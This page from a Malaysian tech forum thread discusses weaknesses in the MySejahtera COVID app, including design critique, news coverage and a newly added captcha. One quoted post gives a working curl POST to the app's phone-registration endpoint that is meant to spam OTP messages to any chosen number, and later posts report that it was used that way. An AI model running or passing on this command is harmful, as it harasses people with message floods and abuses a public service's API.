Welcome Guest ( Log In | Register )

4 Pages < 1 2 3 4 >Bottom

Outline · [ Standard ] · Linear+

 MySejahtera Not So Sejahtera, Full of Exploits

views
     
kidmad
post Oct 19 2021, 08:47 AM

Look at all my stars!!
*******
Senior Member
4,370 posts

Joined: Jul 2005
QUOTE(Darkripper @ Oct 18 2021, 11:13 PM)
you're talking about their backend implementation, which is out-of-reach. Client trigger mysejahtera, which in turn they forward it to provider. It doesn't matter how the backend is implemented if they open their doors wide open.
*
the way u put it there is somethg so wrong in term of the app design. the request should trigger a notification and queue the request somewhere instead of client calling the service immediately. anyway 0 marks to the application design in this case
PzGman
post Oct 19 2021, 08:55 AM

Private Pilot
*****
Junior Member
800 posts

Joined: Jun 2012
From: Petaling Jaya


no offense but that app is crap lol
God Grid
post Oct 19 2021, 10:37 AM

New Member
*
Junior Member
29 posts

Joined: Aug 2021
QUOTE(Darkripper @ Oct 19 2021, 02:51 AM)
jquery is top go-to library when everyone is manually manipulating HTML elements for frontend, it is easier to use than vanilla JS.  It is not bad, just it is not that relevant anymore.

Then SPA like Angular, React comes along, which is easier to code, a little bit more structured and efficient. The best thing about SPA is there is less page refresh, providing a better UX.

Now you even have Vue, Svelte, SolidJS which is trying to overtake React.

Its not just for UI, but for client-side aka frontend to render and do whatever it needs to (communicate with server, service worker to run some shit in the background)
*
yea, jQuery have been more than 10 years? 20 years? but got Ajax ma ahahahahaha

only used Vue for their UI like the Vuetify.

Now it's all about single page application. everything click click click, no idea if it's going to next page or previous page or anything
deejay_krish
post Oct 19 2021, 10:48 AM

You're Just Another Part Of Me
*****
Senior Member
948 posts

Joined: Jul 2005
From: Neverland
so called 70mil
WaCKy-Angel
post Oct 20 2021, 11:52 AM

PeACe~~
*********
All Stars
21,509 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 01:51 PM)
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at terminal of choice and change contact number (Window user pandai pandai tukar la )

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

*
https://www.malaymail.com/news/malaysia/202...res-why/2014651

ur doing? lol
kons
post Oct 20 2021, 12:06 PM

Конс
Group Icon
Moderator
6,142 posts

Joined: Oct 2004



QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM)
yeah someone spam my number with sj otp and i send the screenshot to their helpdesk
diffyhelman2
post Oct 20 2021, 01:19 PM

Enthusiast
*****
Junior Member
807 posts

Joined: Apr 2019
QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM)
LOL, beat me to it:

https://www.freemalaysiatoday.com/category/...ys-mysejahtera/
C-Fu
post Oct 20 2021, 01:38 PM

Ninja-Fu
******
Senior Member
1,051 posts

Joined: Apr 2005
From: Brisbane, QLD, Ostolia



QUOTE(Darkripper @ Oct 18 2021, 02:27 PM)
They can't do that, as that's the endpoint that client side is calling to trigger it. Eaiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit.
It wont solve all, but it reduces the exposure.
*
seems like got captcha now

user posted image
klangboy83
post Oct 20 2021, 03:01 PM

Casual
***
Junior Member
438 posts

Joined: Apr 2007
5 Unicorns by 2025 whistling.gif
flexyx
post Oct 20 2021, 03:04 PM

Getting Started
**
Junior Member
225 posts

Joined: Jun 2009

dah tak boleh

This post has been edited by flexyx: Oct 20 2021, 03:04 PM
Hobbez
post Oct 20 2021, 03:09 PM

Casual
***
Junior Member
365 posts

Joined: Dec 2009
Does anyone think it can send your data to any third parties?

I don't even want to go there....wink.gif


brkli
post Oct 20 2021, 04:05 PM

On my way
****
Junior Member
539 posts

Joined: Oct 2018
kesian TS...
ye0073
post Oct 20 2021, 04:08 PM

Casual
***
Junior Member
344 posts

Joined: Sep 2004
Some one using the TS code and doing spam liao.
Need to report police.
TSDarkripper
post Oct 20 2021, 04:46 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(brkli @ Oct 20 2021, 04:05 PM)
kesian TS...
*
What?
PJng
post Oct 20 2021, 06:14 PM

10k Club
********
All Stars
10,531 posts

Joined: Oct 2017


Ts, you are on front lyn news

https://www.lowyat.net/2021/256199/mysejaht...-spam-api-weak/
IamNOT
post Oct 21 2021, 10:40 AM

Getting Started
**
Junior Member
274 posts

Joined: Aug 2008
From: Malacca


Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless...
TSDarkripper
post Oct 21 2021, 02:57 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(IamNOT @ Oct 21 2021, 10:40 AM)
Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless...
*
aiya, they say its a feature that get exposed. lel... *FEATURE*.

Btw they haven't fix yet also, just add reCAPTCHA, which can be solved using API also
emburrar
post Oct 21 2021, 02:58 PM

New Member
*
Newbie
14 posts

Joined: Oct 2014
From: Bandar Damai dan Indah


Ular kj jawab
filage
post Dec 25 2021, 10:38 AM

Regular
******
Senior Member
1,205 posts

Joined: Aug 2014
Got anyway to make the mysejahtera load faster? If just want to show the fully vaccinated page also take quite 10-15 seconds to load, any workaround to make it faster?
PJng
post Dec 25 2021, 11:04 AM

10k Club
********
All Stars
10,531 posts

Joined: Oct 2017


QUOTE(filage @ Dec 25 2021, 10:38 AM)
Got anyway to make the mysejahtera load faster? If just want to show the fully vaccinated page also take quite 10-15 seconds to load, any workaround to make it faster?
*
Turn off data, more faster

4 Pages < 1 2 3 4 >Top
 

Change to:
| Lo-Fi Version
0.0190sec    0.41    5 queries    GZIP Disabled
Time is now: 28th March 2024 - 04:50 PM